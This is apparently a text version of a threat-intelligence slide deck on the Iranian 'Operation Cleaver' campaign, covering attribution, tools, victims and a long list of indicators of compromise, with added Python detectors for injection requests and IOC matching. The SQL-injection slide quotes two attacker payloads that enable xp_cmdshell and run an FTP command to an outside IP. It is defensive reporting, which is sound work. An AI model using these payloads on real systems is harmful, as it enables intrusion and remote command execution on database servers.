Operation Cleaver: Iran is the next China

Operation Cleaver: Iran is the next China. Numerous references inside the namespaces of their custom bot code codenamed TinyZbot, e.g.: e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb


Page 1

Operation Cleaver
Iran is the next China

Page 2

Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.:

e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb

PDBs associated with the hacker name “Jimbp” e.g.:

c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb

PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:

e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb

Why “Cleaver”?
The name…

Page 3

Targeting of critical infrastructure globally.

Shocking level of access. Network. Systems.

Applications. Databases. DNS. Paypal. GoDaddy.

Basically Everything.

Why Now?
Exposing Cleaver…

Page 4

• Prior to 2010, Iran was almost non-existent as a target and, as an attacker, was mentioned only in terms of website defacement

• In 2010, Stuxnet was realized, severely impacting Iran’s Nuclear program

• Retaliation began…

• Cleaver is an Iranian-born campaign dating to 2012, with some data from 2007.

• Since Shamoon, we have witnessed an evolution of skillset and threat actor

IRAN CYBER ATTACKS
Exposing Cleaver…

Page 5

Page 6

Sourcing: Iranian

GeoIP Location: Iran
Net block: 78.109.194.96 - 78.109.194.127
Owner: Tarh Andishan
Email: tarh.andishan(at)yahoo.com
Phone: +98-21-22496658
NIC-Handle: TAR1973-RIPE

Tarh Andishan – meaning “Innovators”, “Inventors”

78.109.194.96/27 – Current – Afranet, Iran
217.11.17.96/28 – 10/22/2014 – Afranet, Iran
81.90.144.104/29 – 10/5/2014 – Afranet, Middle East Oil, Iran
31.47.35.0/24 – 11/2012 – Afranet, Iran

The logger module binary’s file description value is the following:

ye file khube DG. ba in ham kari nadashte bashin

Roughly translated from Persian, this text says: “DG is a good file, don’t bother with this”

Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time

Netafraz.com infrastructure in Iran

Persian hacker names: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, etc.

Page 7

IranRedline.org

In one of IranRedLine.org’s blog posts, the author speculates on Tarh Andishan’s involvement with the Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and Research.

Sourcing: Tarh Andishan

Page 8

TTPs: SQL Injection

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2
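The two requests above are stacked-query injections: the injected `;declare … EXEC master.dbo.sp_configure` sequence switches on `xp_cmdshell`, and the second request then uses it to run a command. A web-server or WAF log is the place such requests are first visible, but only after the query string has been URL-decoded. The following detector is an added example written for this page; it is not code from the Cleaver report or from Cylance. The tab-separated "client_ip<TAB>url" log format and the client addresses in the sample are assumptions; the two attack URLs are the ones printed on the slide.

```python
"""Detect stacked-query SQL injection requests that try to enable or call
xp_cmdshell, the pattern shown in the two Cleaver request URLs above.

Added example; not code from the Cleaver report or from Cylance. The
tab-separated "client_ip<TAB>url" log format used here is an assumption.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators that, once the query string is URL-decoded, point at an attempt
# to switch on or use command execution through MSSQL. Case-insensitive.
SUSPICIOUS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "sp_configure": re.compile(r"sp_configure", re.I),
    "show advanced options": re.compile(r"show\s+advanced\s+options", re.I),
    "stacked declare/exec": re.compile(r";\s*(?:declare|exec(?:ute)?)\b", re.I),
}


def decode_query(url):
    """Return the query string of a URL, URL-decoded twice so that a
    double-encoded payload is still seen in the clear."""
    query = urlsplit(url).query
    return unquote_plus(unquote_plus(query))


def scan_url(url):
    """Return the names of all indicators matching the decoded query string."""
    decoded = decode_query(url)
    return [name for name, rx in SUSPICIOUS.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (client_ip, url, indicators) for every request line that matches."""
    findings = []
    for line in lines:
        client_ip, sep, url = line.partition("\t")
        if not sep:
            continue  # malformed line; the assumed format is ip<TAB>url
        hits = scan_url(url)
        if hits:
            findings.append((client_ip, url, hits))
    return findings


# The two request URLs as printed on the slide (demo target on localhost).
CLEAVER_URLS = [
    "http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);"
    "set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);"
    "set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;"
    "RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20",
    "http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);"
    "set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2",
]

# Constructed log lines: two attack requests and one benign request. The
# client addresses are documentation-range placeholders, not real indicators.
SAMPLE_LOG = [
    "192.0.2.10\t" + CLEAVER_URLS[0],
    "192.0.2.10\t" + CLEAVER_URLS[1],
    "192.0.2.20\thttp://localhost/Demos/demo.cfm?Edit=1&ID=111",
]

if __name__ == "__main__":
    for client_ip, url, hits in scan_log(SAMPLE_LOG):
        print(client_ip, hits)
```

Decoding twice is deliberate: a `%253B` in the raw log only becomes the `;` that starts a stacked statement after the second pass. The same activity also leaves a server-side trail, since enabling `xp_cmdshell` changes a server-wide option that SQL Server auditing records, so the request-log match and the configuration-change event corroborate each other.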

Page 9

TTPs: Spearphishing: fake resume tool

Page 10

TTPs: Spearphishing: Resume Submitter

Page 11

Escalation and Pivoting
Tools and Toys…

Public: Netcat, Cain & Abel, psexec, Mimikatz, WCE, Putty, Plink, nmap, xcmd, etc.

Custom: TinyZbot, NetC, ASPX webshells, SYN flooder, ARP poisoning, Csext, etc.

Exploits: MS08-067 (Conficker) and MS10-015 (KiTrap0D)

Page 12

• Signing encryption keys for major airline company
• Usernames and passwords from dozens of companies
• 250k Windows credentials at a single Oil company
• Airport and Airline crew credentials
• Airport network configuration files
• SNMP credentials for major Energy Companies
• Student information targeting

Access and Exfil
The damage…

Page 13

Indicators of Compromise (IOCs)
Let’s go hunting… or preferably PREVENTING!

Domains
doosan-job(dot)com
downloadsservers(dot)com
drivercenterupdate(dot)com
easyresumecreatorpro(dot)com
googleproductupdate(dot)com
googleproductupdate(dot)net
kundenpflege.menrad(dot)de
microsoftactiveservices(dot)com
microsoftmiddleast(dot)com
microsoftonlineupdates(dot)com
microsoftserverupdate(dot)com
microsoftupdateserver(dot)net
microsoftwindowsresources(dot)com
microsoftwindowsupdate(dot)net
northropgrumman(dot)net
teledyne-jobs(dot)com
windowscentralupdate(dot)com
windowssecurityupdate(dot)com
windowsserverupdate(dot)com
windowsupdateserver(dot)com
www.gesunddurchsjahr(dot)de

Emails for Domain Registration
davejsmith200(at)outlook.com
salman.ghazikhani(at)outlook.com
btr.8624(at)yahoo.com
ghanbarianco(at)gmail.com
azlinux73(at)gmail.com
domain(at)netafraz.com
tarh.andishan(at)yahoo.com
ahmadi(at)odeconline.com
kafe0(at)yahoo.com
dg_co(at)yahoo.com
zahiry_alireza(at)yahoo.com
zahiry.alireza(at)gmail.com

Emails used for Exfiltration
testmail_00001(at)yahoo.com
TerafficAnalyzer(at)yahoo.com
dyanachear(at)beyondsys.com

IP Addresses
50.23.164.161
64.120.128.154
64.120.208.74
64.120.208.75
64.120.208.76
64.120.208.78
64.120.208.154
66.96.252.198
78.109.194.114
80.243.182.149
87.98.167.71
87.98.167.85
87.98.167.141
88.150.214.162
88.150.214.166
88.150.214.168
88.150.214.170
95.211.191.225
95.211.191.247
95.211.241.249
95.211.241.251
108.175.152.230
108.175.153.158
159.253.144.209
173.192.144.68
174.36.195.158
184.82.158.18
184.82.181.48
188.227.180.213
192.111.145.197
203.150.224.249
207.182.142.68
212.87.154.12
212.87.154.14

Mutexes
ZSC1
Adobe Report Service
Bmgr

Dynamic Mutexes
demdaramdidam
ILoveThisMutex

Installed Service Names
COM+ System Extentions
COM__System_Extentions
Network Connectivity Manager
Service1
MsNetMonitor
Pcapins
scManagerSvc
CredentialSync
Adobe Report Service
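The indicators on this slide are published defanged ("(dot)", "(at)"), and the sourcing slide adds whole netblocks rather than single addresses, so hunting with them means refanging the strings, treating subdomains of a listed domain as matches, and testing addresses for membership in a CIDR rather than string equality. The matcher below is an added example written for this page, not code from the Cleaver report or from Cylance. It carries a subset of the slide's domains, IPs, netblocks and service names (the rest can be pasted into the same lists); the log lines and their format are constructed for the example.

```python
"""Match the Cleaver indicators above against log lines: domains in the
defanged "(dot)" form, C2 IP addresses, the Tarh Andishan netblocks, and
installed service names.

Added example; not code from the Cleaver report or from Cylance. Indicator
values are a subset copied from the slides; the log lines are constructed
and their format is an assumption.
"""
import ipaddress
import re

# Subset of the slide's indicators, kept defanged exactly as listed there.
DEFANGED_DOMAINS = [
    "doosan-job(dot)com", "easyresumecreatorpro(dot)com",
    "microsoftwindowsupdate(dot)net", "windowsupdateserver(dot)com",
    "www.gesunddurchsjahr(dot)de",
]
IOC_IPS = ["78.109.194.114", "108.175.152.230", "88.150.214.162"]
IOC_NETBLOCKS = ["78.109.194.96/27", "217.11.17.96/28",
                 "81.90.144.104/29", "31.47.35.0/24"]
IOC_SERVICES = ["COM+ System Extentions", "Network Connectivity Manager",
                "MsNetMonitor", "scManagerSvc", "CredentialSync",
                "Adobe Report Service"]


def refang(indicator):
    """Turn the report's defanged notation back into a matchable value."""
    return indicator.replace("(dot)", ".").replace("(at)", "@")


DOMAINS = {refang(d).lower() for d in DEFANGED_DOMAINS}
IPS = {ipaddress.ip_address(i) for i in IOC_IPS}
NETWORKS = [ipaddress.ip_network(n) for n in IOC_NETBLOCKS]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def domain_hits(line):
    """Listed domains, and any subdomain of them, found in the line."""
    hits = []
    for host in HOSTNAME.findall(line):
        host = host.lower()
        if host in DOMAINS or any(host.endswith("." + d) for d in DOMAINS):
            hits.append(host)
    return hits


def ip_hits(line):
    """(address, reason) for listed IPs or IPs inside a listed netblock."""
    hits = []
    for text in IPV4.findall(line):
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:
            continue  # e.g. an octet above 255
        if ip in IPS:
            hits.append((text, "listed IP"))
            continue
        for net in NETWORKS:
            if ip in net:
                hits.append((text, "in " + str(net)))
                break
    return hits


def service_hits(line):
    """Listed service names appearing in the line (case-insensitive)."""
    lowered = line.lower()
    return [s for s in IOC_SERVICES if s.lower() in lowered]


def scan(lines):
    """Return (line, hits) for every line with at least one indicator match."""
    results = []
    for line in lines:
        hits = (domain_hits(line)
                + [f"{ip} ({why})" for ip, why in ip_hits(line)]
                + service_hits(line))
        if hits:
            results.append((line, hits))
    return results


# Constructed sample lines: a DNS query, two firewall entries, a service
# installation event, and one benign DNS query that must not match.
SAMPLE_LINES = [
    "2014-10-22T10:15:03Z dns client=10.1.4.22 query=easyresumecreatorpro.com type=A",
    "2014-10-22T10:15:09Z fw allow src=10.1.4.22 dst=78.109.194.120 dport=443",
    "2014-10-22T10:16:41Z fw allow src=10.1.4.22 dst=108.175.152.230 dport=21",
    "2014-10-22T10:20:00Z eventlog id=7045 host=WS17 service='Network Connectivity Manager'",
    "2014-10-22T10:21:00Z dns client=10.1.4.23 query=update.microsoft.com type=A",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LINES):
        print(hits, "<-", line)
```

The second firewall line illustrates why the netblocks matter: 78.109.194.120 is not on the IP list, but it sits inside the Tarh Andishan /27 from the sourcing slide and is reported for that reason. Service-name matching is kept case-insensitive because the names are attacker-chosen look-alikes ("COM+ System Extentions", misspelling included) and appear with varying case across event sources.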

Page 14

Resources
• “Operation Cleaver” Report
• Cylance Blog
• Twitter: @cylanceinc
• Twitter: @hackingexposed
• Email: [email protected] for more information
• Yara rules on Cylance.com
• Test Drive CylancePROTECT: my.cylance.com